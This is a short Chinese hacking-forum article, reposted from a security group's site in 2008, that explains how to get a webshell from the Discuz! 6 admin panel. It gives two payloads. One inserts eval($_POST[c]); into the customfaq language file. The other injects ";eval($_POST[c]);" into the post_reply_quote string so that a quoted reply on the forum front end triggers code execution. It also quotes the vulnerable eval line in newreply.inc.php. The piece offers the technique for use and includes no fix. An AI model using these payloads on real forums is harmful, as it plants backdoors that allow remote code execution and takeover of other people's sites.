Discuz! 6 后台拿Shell的方法

www.hx99.org 阅读: 时间:2008-03-06 整理:华西黑盟
------------------------------------------------------------------

 

文章作者：Ryat （lib3r3t）
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注：文章首发狼族（www.wolvez.org），后由原创作者有请提交到邪恶八进制，转载请注明原始作者和出处。

如果后台可以在线编辑模板的话，下面的方法就可以拿SHELL了：）

1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
复制内容到剪贴板
代码:
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
复制内容到剪贴板
代码:
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码：

include/newreply.inc.php 107行：
复制内容到剪贴板
代码:
eval("\$language[&#39;post_reply_quote&#39;] = \"$language[post_reply_quote]\";");
呵呵，一个天然的后门：）
PS：还有几个编辑模板的地方可以利用，和第二种方法类似。

【免费加入会员】【我要投稿】【关闭本页】